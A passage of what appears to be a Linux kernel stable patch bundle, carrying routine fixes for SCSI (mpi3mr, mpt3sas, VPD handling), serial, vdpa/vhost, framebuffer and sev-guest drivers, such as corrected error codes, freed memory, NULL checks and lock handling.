+ 		sz = sizeof(struct mpi3mr_throttle_group_info);
+ 		mrioc->throttle_groups = kcalloc(mrioc->num_io_throttle_group, sz, GFP_KERNEL);
+-		if (!mrioc->throttle_groups)
++		if (!mrioc->throttle_groups) {
++			retval = -1;
+ 			goto out_failed_noretry;
++		}
+ 	}
+ 
+ 	retval = mpi3mr_enable_events(mrioc);
+@@ -3901,6 +3917,7 @@ out_failed:
+ 		mpi3mr_memset_buffers(mrioc);
+ 		goto retry_init;
+ 	}
++	retval = -1;
+ out_failed_noretry:
+ 	ioc_err(mrioc, "controller initialization failed\n");
+ 	mpi3mr_issue_reset(mrioc, MPI3_SYSIF_HOST_DIAG_RESET_ACTION_DIAG_FAULT,
+@@ -4013,6 +4030,7 @@ retry_init:
+ 		ioc_err(mrioc,
+ 		    "cannot create minimum number of operational queues expected:%d created:%d\n",
+ 		    mrioc->shost->nr_hw_queues, mrioc->num_op_reply_q);
++		retval = -1;
+ 		goto out_failed_noretry;
+ 	}
+ 
+@@ -4079,6 +4097,7 @@ out_failed:
+ 		mpi3mr_memset_buffers(mrioc);
+ 		goto retry_init;
+ 	}
++	retval = -1;
+ out_failed_noretry:
+ 	ioc_err(mrioc, "controller %s is failed\n",
+ 	    (is_resume)?"resume":"re-initialization");
+@@ -4156,6 +4175,7 @@ void mpi3mr_memset_buffers(struct mpi3mr_ioc *mrioc)
+ 		memset(mrioc->admin_req_base, 0, mrioc->admin_req_q_sz);
+ 	if (mrioc->admin_reply_base)
+ 		memset(mrioc->admin_reply_base, 0, mrioc->admin_reply_q_sz);
++	atomic_set(&mrioc->admin_reply_q_in_use, 0);
+ 
+ 	if (mrioc->init_cmds.reply) {
+ 		memset(mrioc->init_cmds.reply, 0, sizeof(*mrioc->init_cmds.reply));
+@@ -4351,13 +4371,20 @@ void mpi3mr_free_mem(struct mpi3mr_ioc *mrioc)
+ 		    mrioc->admin_req_base, mrioc->admin_req_dma);
+ 		mrioc->admin_req_base = NULL;
+ 	}
+-
++	if (mrioc->cfg_page) {
++		dma_free_coherent(&mrioc->pdev->dev, mrioc->cfg_page_sz,
++		    mrioc->cfg_page, mrioc->cfg_page_dma);
++		mrioc->cfg_page = NULL;
++	}
+ 	if (mrioc->pel_seqnum_virt) {
+ 		dma_free_coherent(&mrioc->pdev->dev, mrioc->pel_seqnum_sz,
+ 		    mrioc->pel_seqnum_virt, mrioc->pel_seqnum_dma);
+ 		mrioc->pel_seqnum_virt = NULL;
+ 	}
+ 
++	kfree(mrioc->throttle_groups);
++	mrioc->throttle_groups = NULL;
++
+ 	kfree(mrioc->logdata_buf);
+ 	mrioc->logdata_buf = NULL;
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_os.c b/drivers/scsi/mpi3mr/mpi3mr_os.c
+index 6eaeba41072cb..6d55698ea4d16 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_os.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_os.c
+@@ -3720,6 +3720,7 @@ int mpi3mr_issue_tm(struct mpi3mr_ioc *mrioc, u8 tm_type,
+ 		mpi3mr_poll_pend_io_completions(mrioc);
+ 		mpi3mr_ioc_enable_intr(mrioc);
+ 		mpi3mr_poll_pend_io_completions(mrioc);
++		mpi3mr_process_admin_reply_q(mrioc);
+ 	}
+ 	switch (tm_type) {
+ 	case MPI3_SCSITASKMGMT_TASKTYPE_TARGET_RESET:
+@@ -5077,6 +5078,8 @@ static void mpi3mr_remove(struct pci_dev *pdev)
+ 	struct workqueue_struct	*wq;
+ 	unsigned long flags;
+ 	struct mpi3mr_tgt_dev *tgtdev, *tgtdev_next;
++	struct mpi3mr_hba_port *port, *hba_port_next;
++	struct mpi3mr_sas_node *sas_expander, *sas_expander_next;
+ 
+ 	if (!shost)
+ 		return;
+@@ -5116,6 +5119,28 @@ static void mpi3mr_remove(struct pci_dev *pdev)
+ 	mpi3mr_free_mem(mrioc);
+ 	mpi3mr_cleanup_resources(mrioc);
+ 
++	spin_lock_irqsave(&mrioc->sas_node_lock, flags);
++	list_for_each_entry_safe_reverse(sas_expander, sas_expander_next,
++	    &mrioc->sas_expander_list, list) {
++		spin_unlock_irqrestore(&mrioc->sas_node_lock, flags);
++		mpi3mr_expander_node_remove(mrioc, sas_expander);
++		spin_lock_irqsave(&mrioc->sas_node_lock, flags);
++	}
++	list_for_each_entry_safe(port, hba_port_next, &mrioc->hba_port_table_list, list) {
++		ioc_info(mrioc,
++		    "removing hba_port entry: %p port: %d from hba_port list\n",
++		    port, port->port_id);
++		list_del(&port->list);
++		kfree(port);
++	}
++	spin_unlock_irqrestore(&mrioc->sas_node_lock, flags);
++
++	if (mrioc->sas_hba.num_phys) {
++		kfree(mrioc->sas_hba.phy);
++		mrioc->sas_hba.phy = NULL;
++		mrioc->sas_hba.num_phys = 0;
++	}
++
+ 	spin_lock(&mrioc_list_lock);
+ 	list_del(&mrioc->list);
+ 	spin_unlock(&mrioc_list_lock);
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_transport.c b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+index 3b61815979dab..50263ba4f8428 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_transport.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+@@ -9,9 +9,6 @@
+ 
+ #include "mpi3mr.h"
+ 
+-static void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
+-	struct mpi3mr_sas_node *sas_expander);
+-
+ /**
+  * mpi3mr_post_transport_req - Issue transport requests and wait
+  * @mrioc: Adapter instance reference
+@@ -2163,7 +2160,7 @@ out_fail:
+  *
+  * Return nothing.
+  */
+-static void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
++void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
+ 	struct mpi3mr_sas_node *sas_expander)
+ {
+ 	struct mpi3mr_sas_port *mr_sas_port, *next;
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_transport.c b/drivers/scsi/mpt3sas/mpt3sas_transport.c
+index e5ecd6ada6cdd..e8a4750f6ec47 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_transport.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_transport.c
+@@ -785,7 +785,7 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 		goto out_fail;
+ 	}
+ 	port = sas_port_alloc_num(sas_node->parent_dev);
+-	if ((sas_port_add(port))) {
++	if (!port || (sas_port_add(port))) {
+ 		ioc_err(ioc, "failure at %s:%d/%s()!\n",
+ 			__FILE__, __LINE__, __func__);
+ 		goto out_fail;
+@@ -824,6 +824,12 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 			    mpt3sas_port->remote_identify.sas_address;
+ 	}
+ 
++	if (!rphy) {
++		ioc_err(ioc, "failure at %s:%d/%s()!\n",
++			__FILE__, __LINE__, __func__);
++		goto out_delete_port;
++	}
++
+ 	rphy->identify = mpt3sas_port->remote_identify;
+ 
+ 	if ((sas_rphy_add(rphy))) {
+@@ -831,6 +837,7 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 			__FILE__, __LINE__, __func__);
+ 		sas_rphy_free(rphy);
+ 		rphy = NULL;
++		goto out_delete_port;
+ 	}
+ 
+ 	if (mpt3sas_port->remote_identify.device_type == SAS_END_DEVICE) {
+@@ -857,7 +864,10 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 		    rphy_to_expander_device(rphy), hba_port->port_id);
+ 	return mpt3sas_port;
+ 
+- out_fail:
++out_delete_port:
++	sas_port_delete(port);
++
++out_fail:
+ 	list_for_each_entry_safe(mpt3sas_phy, next, &mpt3sas_port->phy_list,
+ 	    port_siblings)
+ 		list_del(&mpt3sas_phy->port_siblings);
+diff --git a/drivers/scsi/scsi.c b/drivers/scsi/scsi.c
+index c59eac7a32f2a..24c4c92543599 100644
+--- a/drivers/scsi/scsi.c
++++ b/drivers/scsi/scsi.c
+@@ -326,6 +326,9 @@ static int scsi_get_vpd_size(struct scsi_device *sdev, u8 page)
+ 	unsigned char vpd_header[SCSI_VPD_HEADER_SIZE] __aligned(4);
+ 	int result;
+ 
++	if (sdev->no_vpd_size)
++		return SCSI_DEFAULT_VPD_LEN;
++
+ 	/*
+ 	 * Fetch the VPD page header to find out how big the page
+ 	 * is. This is done to prevent problems on legacy devices
+diff --git a/drivers/scsi/scsi_devinfo.c b/drivers/scsi/scsi_devinfo.c
+index c7080454aea99..bc9d280417f6a 100644
+--- a/drivers/scsi/scsi_devinfo.c
++++ b/drivers/scsi/scsi_devinfo.c
+@@ -134,7 +134,7 @@ static struct {
+ 	{"3PARdata", "VV", NULL, BLIST_REPORTLUN2},
+ 	{"ADAPTEC", "AACRAID", NULL, BLIST_FORCELUN},
+ 	{"ADAPTEC", "Adaptec 5400S", NULL, BLIST_FORCELUN},
+-	{"AIX", "VDASD", NULL, BLIST_TRY_VPD_PAGES},
++	{"AIX", "VDASD", NULL, BLIST_TRY_VPD_PAGES | BLIST_NO_VPD_SIZE},
+ 	{"AFT PRO", "-IX CF", "0.0>", BLIST_FORCELUN},
+ 	{"BELKIN", "USB 2 HS-CF", "1.95",  BLIST_FORCELUN | BLIST_INQUIRY_36},
+ 	{"BROWNIE", "1200U3P", NULL, BLIST_NOREPORTLUN},
+@@ -188,6 +188,7 @@ static struct {
+ 	{"HPE", "OPEN-", "*", BLIST_REPORTLUN2 | BLIST_TRY_VPD_PAGES},
+ 	{"IBM", "AuSaV1S2", NULL, BLIST_FORCELUN},
+ 	{"IBM", "ProFibre 4000R", "*", BLIST_SPARSELUN | BLIST_LARGELUN},
++	{"IBM", "2076", NULL, BLIST_NO_VPD_SIZE},
+ 	{"IBM", "2105", NULL, BLIST_RETRY_HWERROR},
+ 	{"iomega", "jaz 1GB", "J.86", BLIST_NOTQ | BLIST_NOLUN},
+ 	{"IOMEGA", "ZIP", NULL, BLIST_NOTQ | BLIST_NOLUN},
+diff --git a/drivers/scsi/scsi_scan.c b/drivers/scsi/scsi_scan.c
+index d149b218715e5..d12f2dcb4040a 100644
+--- a/drivers/scsi/scsi_scan.c
++++ b/drivers/scsi/scsi_scan.c
+@@ -1056,6 +1056,9 @@ static int scsi_add_lun(struct scsi_device *sdev, unsigned char *inq_result,
+ 	else if (*bflags & BLIST_SKIP_VPD_PAGES)
+ 		sdev->skip_vpd_pages = 1;
+ 
++	if (*bflags & BLIST_NO_VPD_SIZE)
++		sdev->no_vpd_size = 1;
++
+ 	transport_configure_device(&sdev->sdev_gendev);
+ 
+ 	if (sdev->host->hostt->slave_configure) {
+diff --git a/drivers/soc/mediatek/mtk-svs.c b/drivers/soc/mediatek/mtk-svs.c
+index 00526fd37d7b8..e55fb16fdc5ac 100644
+--- a/drivers/soc/mediatek/mtk-svs.c
++++ b/drivers/soc/mediatek/mtk-svs.c
+@@ -138,6 +138,7 @@
+ 
+ static DEFINE_SPINLOCK(svs_lock);
+ 
++#ifdef CONFIG_DEBUG_FS
+ #define debug_fops_ro(name)						\
+ 	static int svs_##name##_debug_open(struct inode *inode,		\
+ 					   struct file *filp)		\
+@@ -170,6 +171,7 @@ static DEFINE_SPINLOCK(svs_lock);
+ 	}
+ 
+ #define svs_dentry_data(name)	{__stringify(name), &svs_##name##_debug_fops}
++#endif
+ 
+ /**
+  * enum svsb_phase - svs bank phase enumeration
+@@ -628,6 +630,7 @@ unlock_mutex:
+ 	return ret;
+ }
+ 
++#ifdef CONFIG_DEBUG_FS
+ static int svs_dump_debug_show(struct seq_file *m, void *p)
+ {
+ 	struct svs_platform *svsp = (struct svs_platform *)m->private;
+@@ -843,6 +846,7 @@ static int svs_create_debug_cmds(struct svs_platform *svsp)
+ 
+ 	return 0;
+ }
++#endif /* CONFIG_DEBUG_FS */
+ 
+ static u32 interpolate(u32 f0, u32 f1, u32 v0, u32 v1, u32 fx)
+ {
+@@ -2444,11 +2448,13 @@ static int svs_probe(struct platform_device *pdev)
+ 		goto svs_probe_iounmap;
+ 	}
+ 
++#ifdef CONFIG_DEBUG_FS
+ 	ret = svs_create_debug_cmds(svsp);
+ 	if (ret) {
+ 		dev_err(svsp->dev, "svs create debug cmds fail: %d\n", ret);
+ 		goto svs_probe_iounmap;
+ 	}
++#endif
+ 
+ 	return 0;
+ 
+diff --git a/drivers/tty/serial/8250/8250_em.c b/drivers/tty/serial/8250/8250_em.c
+index f8e99995eee91..d94c3811a8f7a 100644
+--- a/drivers/tty/serial/8250/8250_em.c
++++ b/drivers/tty/serial/8250/8250_em.c
+@@ -106,8 +106,8 @@ static int serial8250_em_probe(struct platform_device *pdev)
+ 	memset(&up, 0, sizeof(up));
+ 	up.port.mapbase = regs->start;
+ 	up.port.irq = irq;
+-	up.port.type = PORT_UNKNOWN;
+-	up.port.flags = UPF_BOOT_AUTOCONF | UPF_FIXED_PORT | UPF_IOREMAP;
++	up.port.type = PORT_16750;
++	up.port.flags = UPF_FIXED_PORT | UPF_IOREMAP | UPF_FIXED_TYPE;
+ 	up.port.dev = &pdev->dev;
+ 	up.port.private_data = priv;
+ 
+diff --git a/drivers/tty/serial/8250/8250_fsl.c b/drivers/tty/serial/8250/8250_fsl.c
+index 8aad15622a2e5..8adfaa183f778 100644
+--- a/drivers/tty/serial/8250/8250_fsl.c
++++ b/drivers/tty/serial/8250/8250_fsl.c
+@@ -34,7 +34,7 @@ int fsl8250_handle_irq(struct uart_port *port)
+ 
+ 	iir = port->serial_in(port, UART_IIR);
+ 	if (iir & UART_IIR_NO_INT) {
+-		spin_unlock(&up->port.lock);
++		spin_unlock_irqrestore(&up->port.lock, flags);
+ 		return 0;
+ 	}
+ 
+@@ -42,7 +42,7 @@ int fsl8250_handle_irq(struct uart_port *port)
+ 	if (unlikely(up->lsr_saved_flags & UART_LSR_BI)) {
+ 		up->lsr_saved_flags &= ~UART_LSR_BI;
+ 		port->serial_in(port, UART_RX);
+-		spin_unlock(&up->port.lock);
++		spin_unlock_irqrestore(&up->port.lock, flags);
+ 		return 1;
+ 	}
+ 
+diff --git a/drivers/tty/serial/8250/Kconfig b/drivers/tty/serial/8250/Kconfig
+index b0f62345bc846..583a340f99345 100644
+--- a/drivers/tty/serial/8250/Kconfig
++++ b/drivers/tty/serial/8250/Kconfig
+@@ -253,8 +253,9 @@ config SERIAL_8250_ASPEED_VUART
+ 	tristate "Aspeed Virtual UART"
+ 	depends on SERIAL_8250
+ 	depends on OF
+-	depends on REGMAP && MFD_SYSCON
++	depends on MFD_SYSCON
+ 	depends on ARCH_ASPEED || COMPILE_TEST
++	select REGMAP
+ 	help
+ 	  If you want to use the virtual UART (VUART) device on Aspeed
+ 	  BMC platforms, enable this option. This enables the 16550A-
+diff --git a/drivers/tty/serial/Kconfig b/drivers/tty/serial/Kconfig
+index 434f83168546c..4fce15296f311 100644
+--- a/drivers/tty/serial/Kconfig
++++ b/drivers/tty/serial/Kconfig
+@@ -1311,7 +1311,7 @@ config SERIAL_FSL_LPUART
+ 
+ config SERIAL_FSL_LPUART_CONSOLE
+ 	bool "Console on Freescale lpuart serial port"
+-	depends on SERIAL_FSL_LPUART
++	depends on SERIAL_FSL_LPUART=y
+ 	select SERIAL_CORE_CONSOLE
+ 	select SERIAL_EARLYCON
+ 	help
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index f9d667ce1619e..c51883f34ac2b 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -2184,9 +2184,15 @@ lpuart32_set_termios(struct uart_port *port, struct ktermios *termios,
+ 	/* update the per-port timeout */
+ 	uart_update_timeout(port, termios->c_cflag, baud);
+ 
+-	/* wait transmit engin complete */
+-	lpuart32_write(&sport->port, 0, UARTMODIR);
+-	lpuart32_wait_bit_set(&sport->port, UARTSTAT, UARTSTAT_TC);
++	/*
++	 * LPUART Transmission Complete Flag may never be set while queuing a break
++	 * character, so skip waiting for transmission complete when UARTCTRL_SBK is
++	 * asserted.
++	 */
++	if (!(old_ctrl & UARTCTRL_SBK)) {
++		lpuart32_write(&sport->port, 0, UARTMODIR);
++		lpuart32_wait_bit_set(&sport->port, UARTSTAT, UARTSTAT_TC);
++	}
+ 
+ 	/* disable transmit and receive */
+ 	lpuart32_write(&sport->port, old_ctrl & ~(UARTCTRL_TE | UARTCTRL_RE),
+diff --git a/drivers/vdpa/mlx5/core/mlx5_vdpa.h b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+index 058fbe28107e9..25fc4120b618d 100644
+--- a/drivers/vdpa/mlx5/core/mlx5_vdpa.h
++++ b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+@@ -96,6 +96,7 @@ struct mlx5_vdpa_dev {
+ 	struct mlx5_control_vq cvq;
+ 	struct workqueue_struct *wq;
+ 	unsigned int group2asid[MLX5_VDPA_NUMVQ_GROUPS];
++	bool suspended;
+ };
+ 
+ int mlx5_vdpa_alloc_pd(struct mlx5_vdpa_dev *dev, u32 *pdn, u16 uid);
+diff --git a/drivers/vdpa/mlx5/net/mlx5_vnet.c b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+index 3a6dbbc6440d4..daac3ab314785 100644
+--- a/drivers/vdpa/mlx5/net/mlx5_vnet.c
++++ b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+@@ -2411,7 +2411,7 @@ static int mlx5_vdpa_change_map(struct mlx5_vdpa_dev *mvdev,
+ 	if (err)
+ 		goto err_mr;
+ 
+-	if (!(mvdev->status & VIRTIO_CONFIG_S_DRIVER_OK))
++	if (!(mvdev->status & VIRTIO_CONFIG_S_DRIVER_OK) || mvdev->suspended)
+ 		goto err_mr;
+ 
+ 	restore_channels_info(ndev);
+@@ -2579,6 +2579,7 @@ static int mlx5_vdpa_reset(struct vdpa_device *vdev)
+ 	clear_vqs_ready(ndev);
+ 	mlx5_vdpa_destroy_mr(&ndev->mvdev);
+ 	ndev->mvdev.status = 0;
++	ndev->mvdev.suspended = false;
+ 	ndev->cur_num_vqs = 0;
+ 	ndev->mvdev.cvq.received_desc = 0;
+ 	ndev->mvdev.cvq.completed_desc = 0;
+@@ -2815,6 +2816,8 @@ static int mlx5_vdpa_suspend(struct vdpa_device *vdev)
+ 	struct mlx5_vdpa_virtqueue *mvq;
+ 	int i;
+ 
++	mlx5_vdpa_info(mvdev, "suspending device\n");
++
+ 	down_write(&ndev->reslock);
+ 	ndev->nb_registered = false;
+ 	mlx5_notifier_unregister(mvdev->mdev, &ndev->nb);
+@@ -2824,6 +2827,7 @@ static int mlx5_vdpa_suspend(struct vdpa_device *vdev)
+ 		suspend_vq(ndev, mvq);
+ 	}
+ 	mlx5_vdpa_cvq_suspend(mvdev);
++	mvdev->suspended = true;
+ 	up_write(&ndev->reslock);
+ 	return 0;
+ }
+diff --git a/drivers/vdpa/vdpa_sim/vdpa_sim.c b/drivers/vdpa/vdpa_sim/vdpa_sim.c
+index cb88891b44a8c..61bde476cf9c8 100644
+--- a/drivers/vdpa/vdpa_sim/vdpa_sim.c
++++ b/drivers/vdpa/vdpa_sim/vdpa_sim.c
+@@ -66,6 +66,7 @@ static void vdpasim_vq_notify(struct vringh *vring)
+ static void vdpasim_queue_ready(struct vdpasim *vdpasim, unsigned int idx)
+ {
+ 	struct vdpasim_virtqueue *vq = &vdpasim->vqs[idx];
++	uint16_t last_avail_idx = vq->vring.last_avail_idx;
+ 
+ 	vringh_init_iotlb(&vq->vring, vdpasim->features, vq->num, false,
+ 			  (struct vring_desc *)(uintptr_t)vq->desc_addr,
+@@ -74,6 +75,18 @@ static void vdpasim_queue_ready(struct vdpasim *vdpasim, unsigned int idx)
+ 			  (struct vring_used *)
+ 			  (uintptr_t)vq->device_addr);
+ 
++	vq->vring.last_avail_idx = last_avail_idx;
++
++	/*
++	 * Since vdpa_sim does not support receive inflight descriptors as a
++	 * destination of a migration, let's set both avail_idx and used_idx
++	 * the same at vq start.  This is how vhost-user works in a
++	 * VHOST_SET_VRING_BASE call.
++	 *
++	 * Although the simple fix is to set last_used_idx at
++	 * vdpasim_set_vq_state, it would be reset at vdpasim_queue_ready.
++	 */
++	vq->vring.last_used_idx = last_avail_idx;
+ 	vq->vring.notify = vdpasim_vq_notify;
+ }
+ 
+diff --git a/drivers/vdpa/virtio_pci/vp_vdpa.c b/drivers/vdpa/virtio_pci/vp_vdpa.c
+index 8fe267ca3e76f..281287fae89f1 100644
+--- a/drivers/vdpa/virtio_pci/vp_vdpa.c
++++ b/drivers/vdpa/virtio_pci/vp_vdpa.c
+@@ -645,8 +645,8 @@ static void vp_vdpa_remove(struct pci_dev *pdev)
+ 	struct virtio_pci_modern_device *mdev = NULL;
+ 
+ 	mdev = vp_vdpa_mgtdev->mdev;
+-	vp_modern_remove(mdev);
+ 	vdpa_mgmtdev_unregister(&vp_vdpa_mgtdev->mgtdev);
++	vp_modern_remove(mdev);
+ 	kfree(vp_vdpa_mgtdev->mgtdev.id_table);
+ 	kfree(mdev);
+ 	kfree(vp_vdpa_mgtdev);
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index ec32f785dfdec..b7657984dd8df 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -1134,6 +1134,7 @@ static int vhost_vdpa_alloc_domain(struct vhost_vdpa *v)
+ 
+ err_attach:
+ 	iommu_domain_free(v->domain);
++	v->domain = NULL;
+ 	return ret;
+ }
+ 
+@@ -1178,6 +1179,7 @@ static void vhost_vdpa_cleanup(struct vhost_vdpa *v)
+ 			vhost_vdpa_remove_as(v, asid);
+ 	}
+ 
++	vhost_vdpa_free_domain(v);
+ 	vhost_dev_cleanup(&v->vdev);
+ 	kfree(v->vdev.vqs);
+ }
+@@ -1250,7 +1252,6 @@ static int vhost_vdpa_release(struct inode *inode, struct file *filep)
+ 	vhost_vdpa_clean_irq(v);
+ 	vhost_vdpa_reset(v);
+ 	vhost_dev_stop(&v->vdev);
+-	vhost_vdpa_free_domain(v);
+ 	vhost_vdpa_config_put(v);
+ 	vhost_vdpa_cleanup(v);
+ 	mutex_unlock(&d->mutex);
+diff --git a/drivers/video/fbdev/chipsfb.c b/drivers/video/fbdev/chipsfb.c
+index f1c1c95c1fdf0..2ecb97c619b7c 100644
+--- a/drivers/video/fbdev/chipsfb.c
++++ b/drivers/video/fbdev/chipsfb.c
+@@ -358,16 +358,21 @@ static int chipsfb_pci_init(struct pci_dev *dp, const struct pci_device_id *ent)
+ 	if (rc)
+ 		return rc;
+ 
+-	if (pci_enable_device(dp) < 0) {
++	rc = pci_enable_device(dp);
++	if (rc < 0) {
+ 		dev_err(&dp->dev, "Cannot enable PCI device\n");
+ 		goto err_out;
+ 	}
+ 
+-	if ((dp->resource[0].flags & IORESOURCE_MEM) == 0)
++	if ((dp->resource[0].flags & IORESOURCE_MEM) == 0) {
++		rc = -ENODEV;
+ 		goto err_disable;
++	}
+ 	addr = pci_resource_start(dp, 0);
+-	if (addr == 0)
++	if (addr == 0) {
++		rc = -ENODEV;
+ 		goto err_disable;
++	}
+ 
+ 	p = framebuffer_alloc(0, &dp->dev);
+ 	if (p == NULL) {
+@@ -417,7 +422,8 @@ static int chipsfb_pci_init(struct pci_dev *dp, const struct pci_device_id *ent)
+ 
+ 	init_chips(p, addr);
+ 
+-	if (register_framebuffer(p) < 0) {
++	rc = register_framebuffer(p);
++	if (rc < 0) {
+ 		dev_err(&dp->dev,"C&T 65550 framebuffer failed to register\n");
+ 		goto err_unmap;
+ 	}
+diff --git a/drivers/video/fbdev/core/fb_defio.c b/drivers/video/fbdev/core/fb_defio.c
+index 583cbcf094467..a3cf1f764f29b 100644
+--- a/drivers/video/fbdev/core/fb_defio.c
++++ b/drivers/video/fbdev/core/fb_defio.c
+@@ -309,17 +309,18 @@ void fb_deferred_io_open(struct fb_info *info,
+ 			 struct inode *inode,
+ 			 struct file *file)
+ {
++	struct fb_deferred_io *fbdefio = info->fbdefio;
++
+ 	file->f_mapping->a_ops = &fb_deferred_io_aops;
++	fbdefio->open_count++;
+ }
+ EXPORT_SYMBOL_GPL(fb_deferred_io_open);
+ 
+-void fb_deferred_io_release(struct fb_info *info)
++static void fb_deferred_io_lastclose(struct fb_info *info)
+ {
+-	struct fb_deferred_io *fbdefio = info->fbdefio;
+ 	struct page *page;
+ 	int i;
+ 
+-	BUG_ON(!fbdefio);
+ 	cancel_delayed_work_sync(&info->deferred_work);
+ 
+ 	/* clear out the mapping that we setup */
+@@ -328,13 +329,21 @@ void fb_deferred_io_release(struct fb_info *info)
+ 		page->mapping = NULL;
+ 	}
+ }
++
++void fb_deferred_io_release(struct fb_info *info)
++{
++	struct fb_deferred_io *fbdefio = info->fbdefio;
++
++	if (!--fbdefio->open_count)
++		fb_deferred_io_lastclose(info);
++}
+ EXPORT_SYMBOL_GPL(fb_deferred_io_release);
+ 
+ void fb_deferred_io_cleanup(struct fb_info *info)
+ {
+ 	struct fb_deferred_io *fbdefio = info->fbdefio;
+ 
+-	fb_deferred_io_release(info);
++	fb_deferred_io_lastclose(info);
+ 
+ 	kvfree(info->pagerefs);
+ 	mutex_destroy(&fbdefio->lock);
+diff --git a/drivers/video/fbdev/stifb.c b/drivers/video/fbdev/stifb.c
+index 3feb6e40d56d8..ef8a4c5fc6875 100644
+--- a/drivers/video/fbdev/stifb.c
++++ b/drivers/video/fbdev/stifb.c
+@@ -921,6 +921,28 @@ SETUP_HCRX(struct stifb_info *fb)
+ 
+ /* ------------------- driver specific functions --------------------------- */
+ 
++static int
++stifb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
++{
++	struct stifb_info *fb = container_of(info, struct stifb_info, info);
++
++	if (var->xres != fb->info.var.xres ||
++	    var->yres != fb->info.var.yres ||
++	    var->bits_per_pixel != fb->info.var.bits_per_pixel)
++		return -EINVAL;
++
++	var->xres_virtual = var->xres;
++	var->yres_virtual = var->yres;
++	var->xoffset = 0;
++	var->yoffset = 0;
++	var->grayscale = fb->info.var.grayscale;
++	var->red.length = fb->info.var.red.length;
++	var->green.length = fb->info.var.green.length;
++	var->blue.length = fb->info.var.blue.length;
++
++	return 0;
++}
++
+ static int
+ stifb_setcolreg(u_int regno, u_int red, u_int green,
+ 	      u_int blue, u_int transp, struct fb_info *info)
+@@ -1145,6 +1167,7 @@ stifb_init_display(struct stifb_info *fb)
+ 
+ static const struct fb_ops stifb_ops = {
+ 	.owner		= THIS_MODULE,
++	.fb_check_var	= stifb_check_var,
+ 	.fb_setcolreg	= stifb_setcolreg,
+ 	.fb_blank	= stifb_blank,
+ 	.fb_fillrect	= stifb_fillrect,
+@@ -1164,6 +1187,7 @@ static int __init stifb_init_fb(struct sti_struct *sti, int bpp_pref)
+ 	struct stifb_info *fb;
+ 	struct fb_info *info;
+ 	unsigned long sti_rom_address;
++	char modestr[32];
+ 	char *dev_name;
+ 	int bpp, xres, yres;
+ 
+@@ -1342,6 +1366,9 @@ static int __init stifb_init_fb(struct sti_struct *sti, int bpp_pref)
+ 	info->flags = FBINFO_HWACCEL_COPYAREA | FBINFO_HWACCEL_FILLRECT;
+ 	info->pseudo_palette = &fb->pseudo_palette;
+ 
++	scnprintf(modestr, sizeof(modestr), "%dx%d-%d", xres, yres, bpp);
++	fb_find_mode(&info->var, info, modestr, NULL, 0, NULL, bpp);
++
+ 	/* This has to be done !!! */
+ 	if (fb_alloc_cmap(&info->cmap, NR_PALETTE, 0))
+ 		goto out_err1;
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 6de888bce1bb1..741d12f75726c 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -31,6 +31,9 @@
+ #define AAD_LEN		48
+ #define MSG_HDR_VER	1
+ 
++#define SNP_REQ_MAX_RETRY_DURATION	(60*HZ)
++#define SNP_REQ_RETRY_DELAY		(2*HZ)
++
+ struct snp_guest_crypto {
+ 	struct crypto_aead *tfm;
+ 	u8 *iv, *authtag;
+@@ -320,26 +323,14 @@ static int enc_payload(struct snp_guest_dev *snp_dev, u64 seqno, int version, u8
+ 	return __enc_payload(snp_dev, req, payload, sz);
+ }
+ 
+-static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, int msg_ver,
+-				u8 type, void *req_buf, size_t req_sz, void *resp_buf,
+-				u32 resp_sz, __u64 *fw_err)
++static int __handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, __u64 *fw_err)
+ {
+-	unsigned long err;
+-	u64 seqno;
++	unsigned long err = 0xff, override_err = 0;
++	unsigned long req_start = jiffies;
++	unsigned int override_npages = 0;
+ 	int rc;
+ 
+-	/* Get message sequence and verify that its a non-zero */
+-	seqno = snp_get_msg_seqno(snp_dev);
+-	if (!seqno)
+-		return -EIO;
+-
+-	memset(snp_dev->response, 0, sizeof(struct snp_guest_msg));
+-
+-	/* Encrypt the userspace provided payload */
+-	rc = enc_payload(snp_dev, seqno, msg_ver, type, req_buf, req_sz);
+-	if (rc)
+-		return rc;
+-
++retry_request:
+ 	/*
+ 	 * Call firmware to process the request. In this function the encrypted
+ 	 * message enters shared memory with the host. So after this call the
+@@ -347,18 +338,24 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	 * prevent reuse of the IV.
+ 	 */
+ 	rc = snp_issue_guest_request(exit_code, &snp_dev->input, &err);
++	switch (rc) {
++	case -ENOSPC:
++		/*
++		 * If the extended guest request fails due to having too
++		 * small of a certificate data buffer, retry the same
++		 * guest request without the extended data request in
